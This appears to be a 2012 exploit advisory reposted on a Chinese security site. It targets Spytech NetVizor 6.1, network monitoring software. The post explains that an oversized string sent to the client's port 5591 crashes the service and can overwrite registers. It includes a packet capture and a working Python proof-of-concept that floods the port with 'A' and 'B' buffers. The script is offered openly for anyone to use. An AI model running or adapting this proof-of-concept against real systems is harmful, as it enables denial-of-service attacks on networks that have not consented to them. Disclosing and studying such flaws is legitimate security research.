首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Spytech NetVizor v6.1 (services.exe) DoS
来源:vfocus.net 作者:loneferret 发布时间:2012-08-14  

# Author: loneferret of Offensive Security
# Product: Spytech VetVizor
# Version: Build Release 6.1
# Vendor Site: hhttp://www.spytech-web.com/
# Software Download: http://www.spytech-web.com/download.shtml#netvizor


# Descriptions:
# NetVizor is the latest in network monitoring software. Monitor your entire network from
# one centralized location! NetVizor allows you to track workstations and individual users
# that may use multiple PC's on a network. NetVizor records everything users do - from keystrokes
# typed to email activity. NetVizor can show you what everyone is doing on your
# network, in real-time, with a single mouse click via its visual network overview and
# real-time activity ticker.

# NetVizor Client DoS:
# Using the NetVizor "Viewer", the administrator can initiate a "RDP" like connection to a
# client workstation with the NetVizor "Client" installed. The port used on the client
# host is 5591, which listens on all interfaces by default. This port is also used by the
# "Viewer" application to grab screenshots of monitored hosts.
# It's possible to have the service crash by sending an overly large string. And it some
# cases this will will overwrite EAX or ECX. Regardless if the registers are overwritten
# or not, the "Viewer" application will no longer be able to initiate a remote desktop
# connection nor will it be able to grab a screen capture.

# Wireshark capture:
# This snip is from a successful connection between the "Viewer" application and the client
# when initiating it's Remote Desktop session. Converting this to HEX and using it in our
# PoC actually triggers it, unfortunately with no proper listener nothing really happens.
#+From the Viewer
#launchremotedesktop
# .r...\Yv.r..+..r .
# x.......r...r........-.......|...h........r.....r....-.......|....s...r..$..r,s...s.....r,s.....r...
# ........h............s...SYvQ..
# ....h...w/.w...v..............2..........SYv...r...r..5.....-............s..Hk..h...

#+From client
# Remote desktop started: C:\PROGRA~1\nvclient\rds.exe

#+And the above as seen from Wireshark.
launchremotedesktop
.r...\Yv.r..+..r .
x.......r...r........-.......|...h........r.....r....-.......|....s...r..$..r,s...s.....r,s.....r...
........h............s...SYvQ..
....h...w/.w...v..............2..........SYv...r...r..5.....-............s..Hk..h...Remote desktop started: C:\PROGRA~1\nvclient\rds.exe

# PoC:
# In the following script, when EAX or ECX is overwritten it will be with the 'B's.
# As always, if someone wants to investigate further go right ahead.
# Just be nice.

#!/usr/bin/python

import socket

buffer1= "[AAAA]"  * 500
buffer2= "BBBB"  * 6000

print "\nSending buffer 1"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('xxx.xxx.xxx.xxx',5591))
s.send(buffer1)
s.close()

raw_input()

print "\nSending buffer 2"
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect(('xxx.xxx.xxx.xxx',5591))
s2.send(buffer2)
s2.close()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Tunnelblick Local Root Exploit
·Pure-FTPd v1.0.21 (centos 6.2,
·Tunnelblick Local Root Exploit
·Winamp Browser Memory Corrupti
·Solaris 10 Patch Cluster Symli
·OS X Local Root Exploit for Vi
·NetDecision 4.2 TFTP Writable
·TestLink 1.9.3 Arbitrary File
·Cyclope Employee Surveillance
·Novell ZENworks Asset Manageme
·IBM Proventia Network Mail Sec
·DivX Plus Player plugin 2.2.0.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved